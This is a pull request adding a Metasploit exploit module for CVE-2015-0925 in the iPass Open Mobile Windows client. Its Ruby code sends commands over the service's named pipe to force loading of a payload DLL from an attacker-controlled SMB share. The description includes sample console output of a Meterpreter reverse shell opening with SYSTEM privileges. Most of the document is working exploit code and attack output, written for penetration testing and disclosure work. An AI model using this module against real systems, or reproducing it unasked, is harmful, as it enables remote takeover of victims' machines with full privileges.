### PR TITLE
Exploit module for CVE 2015-0925 (iPass Open Mobile Windows Client RCE)

### DIFF
--- a/modules/exploits/windows/smb/ipass_pipe_exec.rb
+++ b/modules/exploits/windows/smb/ipass_pipe_exec.rb
@@ -1,0 +1,112 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'IPass Control Pipe Remote Command Execution',
+      'Description'    => %q{
+          This module exploits a vulnerability in the IPass Client service. This service provides a
+          named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused
+          to force the service to load a DLL from a SMB share.
+      },
+      'Author'         =>
+        [
+          'Matthias Kaiser', # Vulnerability discovery
+          'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2015-0925' ],
+          [ 'OSVDB', '117423' ],
+          [ 'BID', '72265' ],
+          [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process',
+        },
+      'Payload'    =>
+        {
+          'Space'    => 2048,
+      'DisableNops' => true
+        },
+      'Platform'    => 'win',
+      'Targets'         =>
+        [
+          [ 'Windows x64', { 'Arch' => [ ARCH_X86_64 ] } ]
+        ],
+      'Privileged'        => true,
+      'DisclosureDate'    => 'Jan 21 2015',
+      'DefaultTarget'    => 0))
+
+      register_options(
+        [
+          OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
+        ], self.class)
+
+      deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')
+  end
+
+  def check
+      echo_value = rand_text_alphanumeric(rand(10) + 10)
+
+      begin
+         response = send_command("System.Echo #{echo_value}")
+         if response =~ Regexp.new(echo_value)
+           return Exploit::CheckCode::Vulnerable
+         else
+           return Exploit::CheckCode::Unknown
+         end
+      rescue Rex::ConnectionError => e
+         vprint_error("Connection failed: #{e.class}: #{e}")
+         return Msf::Exploit::CheckCode::Unknown
+      rescue Rex::Proto::SMB::Exceptions::LoginError => e
+         vprint_error('Connection reset during login')
+         return Msf::Exploit::CheckCode::Unknown
+      end
+  end
+
+  def setup
+      super
+      self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"
+      self.share = Rex::Text.rand_text_alpha(5)
+  end
+
+  def primer
+     self.file_contents = generate_payload_dll
+     print_status("File available on #{unc}...")
+     send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}")
+  end
+
+  def send_command(command)
+      # The connection is closed after each command, so we have to reopen it
+      connect()
+      smb_login()
+      pipe = simple.create_pipe('\\IPEFSYSPCPIPE')
+      pipe.write(Rex::Text.to_unicode(command))
+      response = Rex::Text.to_ascii(pipe.read())
+      response
+  end
+
+
+  def exploit
+    begin
+        Timeout.timeout(datastore['SMB_DELAY']) { super }
+    rescue Timeout::Error
+        # do nothing... just finish exploit and stop smb server...
+    end
+  end
+
+end


### PR DESCRIPTION
This module exploits a vulnerability in the iPass Mobile Client 2.4.4 and earlier. Using a iPass service command on a named pipe it is possible to force the iPass service to load a DLL from a SMB share, allowing RCE as SYSTEM.

A vulnerable version can be found here:
http://ipass.drachenfels.de/download.aspx

If you have any questions, please let me know.
# Example output

```
msf exploit(ipass_pipe_exec) > show options
Module options (exploit/windows/smb/ipass_pipe_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      192.168.XXX.190  yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass    XXXX             no        The password for the specified username
   SMBUser    user             no        The username to authenticate as
   SMB_DELAY  15               yes       Time that the SMB Server will wait for the payload request
   SRVHOST    192.168.XXX.164  yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    445              yes       The local port to listen on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.XXX.164  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x64

msf exploit(ipass_pipe_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.XXX.164:4444
[*] Server started.
[*] File available on \\192.168.XXX.164\XwlTs\pirKiTa.dll...
msf exploit(ipass_pipe_exec) > [*] Sending stage (972288 bytes) to 192.168.XXX.190
[*] Meterpreter session 6 opened (192.168.XXX.164:4444 -> 192.168.XXX.190:54634) at 2015-03-09 11:51:50 -0400
[*] Server stopped.

msf exploit(ipass_pipe_exec) > sessions -i 6
[*] Starting interaction with 6...

meterpreter >


meterpreter > getuid
Server username: $U$NTAUTORITT\SYSTEM-0x4e542d4155544f524954c4545c53595354454d
meterpreter >
```
